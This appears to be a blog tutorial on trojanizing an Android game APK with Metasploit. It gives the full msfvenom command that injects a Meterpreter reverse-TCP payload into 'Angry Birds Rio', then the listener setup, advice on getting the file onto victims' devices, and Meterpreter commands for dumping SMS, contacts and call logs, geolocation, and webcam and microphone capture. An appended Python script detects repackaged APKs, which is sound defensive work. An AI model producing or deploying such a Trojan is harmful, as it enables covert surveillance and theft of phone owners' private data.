Metasploit: Android Session

In previous articles, I have covered how to access a Windows system as well as a Linux system. What if you wanted to gain access to the most widely used Operating System (OS)? In this article, I will cover the process of gaining access to an Android system, which includes tablets and phones.

Similar to the Linux Session article, this article will cover creating a Trojan to gain access to an Android system. First, I will go over how to create the Trojan, and secondly discuss how to get the Trojan onto the Android system. For Network Administrators, you can learn how this process works and train your network users on how to avoid getting Trojans. The result of getting a Trojan onto an Android system is that others can gain access to your device. For phones, that access allows the downloading of your contact list, text messages and a listing of phone calls sent and received.

To start, you need an existing Android Application Package (APK). Find one which seems to be popular and, ideally, requires network access; a game which accesses a server usually works well, although this is not required. Download the APK file to your system. For this example, I will use "Angry Birds Rio". APK files can be downloaded from www.apk4fun.com and saved to your PC. Save the APK file in an easily accessible folder. In my example, I saved it to my Desktop (/home/jarret/Desktop/).

The command to run is:

    msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.2.201 LPORT=3333 -x /home/jarret/Desktop/Angry\ Birds\ Rio\ apkfiles.com.apk R -o /home/jarret/Desktop/Angry\ Birds\ Rio\ apkfiles.com-Out.apk

Let's go over the parameters so you understand how it works.
The options are as follows:

    -a – architecture of the system for the file being created (depends on platform): sparc, x86, x86_64, armle, cbea, cbea64, dalvik, java, mipsbe, mipsle, ppc, ppc64, cmd, tty, x64
    --platform – platform of the target system: AIX, Android, BSD, BSDi, Firefox, Java, Linux, Netware, NodeJS, OSX, PHP, Python, Ruby, Solaris, UNIX, Windows
    -p – payload to use against the target
    -x – template (the existing APK) to use
    -o – output folder and file
    R – format of the output file (raw)

NOTE: Be sure to set the LHOST and LPORT correctly. The LHOST IP address is that of the system on which Metasploit will be running and listening for the Android device. The LPORT is the specific port on which the device will connect back to the LHOST. Keep special note of these values, as they must match the listener set up later.

Once the command completes, you should have a new APK file. Now, you need to get the APK file to the user of the Android device so that it is placed onto the device. By the time the APK file is installed and run, the Metasploit system should be listening for the connection.

NOTE: Be aware that a virus scanner such as Avira can detect the Trojan APK file.

Before moving on to starting Metasploit, let's look at another method of creating the Trojan in a Graphical User Interface (GUI). Open your browser and connect to the Metasploit system on the port specified during installation. The default port is 3790. On my system, I connect to https://192.168.2.201:3709/ and log in using the account created when Metasploit was installed. Once logged in, I can choose the icon for "Payload Generator" as shown in Figure 1.

FIGURE 1

When the "Payload Generator" starts, select "Classic Payload" at the top of the window. Specify the "Platform" as Android and notice that the "Architecture" option disappears. The architecture for Android is Dalvik, and it does not need to be chosen since it is the only option. The "Stager" is set to "reverse_tcp" with the stage set to "android/meterpreter". Set your LHOST and LPORT for the Meterpreter session as needed. The options are shown in Figure 2.
FIGURE 2

Next, select the "Output Options" and set the type of output to "Raw Bytes" as shown in Figure 3. The APK file is not an executable file, but a compressed file with installation instructions, similar to a ".deb" or ".rpm" file. Click "Generate" so the file can be created; you can then "download" the file and specify where to save it. Now, you need to get it onto the Android device and installed there.

FIGURE 3

To start Metasploit listening for the "infected" systems, perform the following:

    use exploit/multi/handler
    set PAYLOAD android/meterpreter/reverse_tcp
    set LHOST 192.168.2.201
    set LPORT 3333
    exploit

NOTE: Since the exploit being loaded is "multi", Metasploit will listen for connections from any system or device. The Operating System (OS) of the connecting device is not limited to a single OS; any OS contacting the LHOST on the LPORT is accepted, and the PAYLOAD set above determines which type of session is expected.

Metasploit should now be listening for a connection from any Trojans that become active. Once the target host has created the session back to Metasploit, you can then start accessing the Android device. The available commands which can be used in Meterpreter are as follows:

Core Commands
=============
    ? - Help menu
    background - Backgrounds the current session
    bgkill - Kills a background meterpreter script
    bglist - Lists running background scripts
    bgrun - Executes a meterpreter script as a background thread
    channel - Displays information about active channels
    close - Closes a channel
    disable_unicode_encoding - Disables encoding of unicode strings
    enable_unicode_encoding - Enables encoding of unicode strings
    exit - Terminate the meterpreter session
    get_timeouts - Get the current session timeout values
    help - Help menu
    info - Displays information about a Post module
    interact - Interacts with a channel
    irb - Drop into irb scripting mode
    load - Load one or more meterpreter extensions
    machine_id - Get the MSF ID of the machine attached to the session
    quit - Terminate the meterpreter session
    read - Reads data from a channel
    resource - Run the commands stored in a file
    run - Executes a meterpreter script or Post module
    set_timeouts - Set the current session timeout values
    sleep - Force Meterpreter to go quiet, then re-establish session
    transport - Change the current transport mechanism
    use - Deprecated alias for 'load'
    uuid - Get the UUID for the current session
    write - Writes data to a channel

Stdapi: File system Commands
============================
    cat - Read the contents of a file to the screen
    cd - Change directory
    download - Download a file or directory
    edit - Edit a file
    getlwd - Print local working directory
    getwd - Print working directory
    lcd - Change local working directory
    lpwd - Print local working directory
    ls - List files
    mkdir - Make directory
    pwd - Print working directory
    rm - Delete the specified file
    rmdir - Remove directory
    search - Search for files
    upload - Upload a file or directory

Stdapi: Networking Commands
===========================
    ifconfig - Display interfaces
    portfwd - Forward a local port to a remote service
    route - View and modify the routing table

Stdapi: System Commands
=======================
    execute - Execute a command
    getuid - Get the user that the server is running as
    ps - List running processes
    shell - Drop into a system command shell
    sysinfo - Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================
    record_mic - Record audio from the default microphone for X seconds
    webcam_chat - Start a video chat
    webcam_list - List webcams
    webcam_snap - Take a snapshot from the specified webcam
    webcam_stream - Play a video stream from the specified webcam

Android Commands
================
    check_root - Check if device is rooted
    dump_calllog - Get call log
    dump_contacts - Get contacts list
    dump_sms - Get sms messages
    geolocate - Get current lat-long using geolocation

Depending on the Android device, some commands may not work. Try this out on an Android device and see how simple it is to attack an Android device and get data from it.

NOTE: To find the Trojan app on the device, look for the installed program called "MainActivity" and uninstall it.
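Network Administrators who want to check whether an APK handed to a user has been rebuilt from a template in the way this article describes can compare it against the vendor's original. The script below is an added example, not Metasploit's code and not part of the original article: it treats both APKs as zip archives, lists added, removed and changed entries, and flags whether the signature files under META-INF differ, since a repackaged APK cannot carry the original developer's signature. The sample archives and the injected path com/example/injected/Stage.dex are constructed for the demonstration.

```python
"""Compare an original APK with a suspect copy to spot repackaging.
Added example, not Metasploit's or the article's own code. An APK is a zip
archive: a copy rebuilt from a template shows added or modified entries and,
because it had to be re-signed, different META-INF signature files.
The sample archives at the bottom are constructed so the script runs offline.
"""
import io
import zipfile

SIG_SUFFIXES = (".RSA", ".DSA", ".EC", ".SF")   # APK v1 signature block files

def apk_entries(data: bytes) -> dict:
    """Map each archive entry name to its CRC32 (a cheap content fingerprint)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: info.CRC for info in zf.infolist()}

def signature_files(names) -> set:
    """Entries under META-INF/ that carry the APK (v1) signature."""
    return {n for n in names
            if n.startswith("META-INF/") and n.upper().endswith(SIG_SUFFIXES)}

def compare_apks(original: bytes, suspect: bytes) -> dict:
    """Return added, removed and modified entries plus a re-signing flag."""
    orig, susp = apk_entries(original), apk_entries(suspect)
    added = sorted(set(susp) - set(orig))
    removed = sorted(set(orig) - set(susp))
    modified = sorted(n for n in orig.keys() & susp.keys() if orig[n] != susp[n])
    sigs_changed = signature_files(orig) != signature_files(susp)
    resigned = sigs_changed or any(n in signature_files(susp) for n in modified)
    return {"added": added, "removed": removed,
            "modified": modified, "resigned": resigned}

def build_apk(files: dict) -> bytes:
    """Build a minimal zip standing in for an APK (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Constructed sample: the vendor's game versus a copy with an injected stage.
ORIGINAL = build_apk({"AndroidManifest.xml": b"<manifest uses=INTERNET/>",
                      "classes.dex": b"dex035-original",
                      "META-INF/CERT.RSA": b"developer-signature"})
SUSPECT = build_apk({"AndroidManifest.xml": b"<manifest uses=INTERNET,READ_SMS/>",
                     "classes.dex": b"dex035-repackaged",
                     "com/example/injected/Stage.dex": b"injected",  # hypothetical
                     "META-INF/CERT.RSA": b"attacker-signature"})
```

Run compare_apks(ORIGINAL, SUSPECT) to see the added entry, the three changed entries and the re-signing flag; a genuine vendor update changes content but keeps the same signing files, whereas a rebuilt copy cannot.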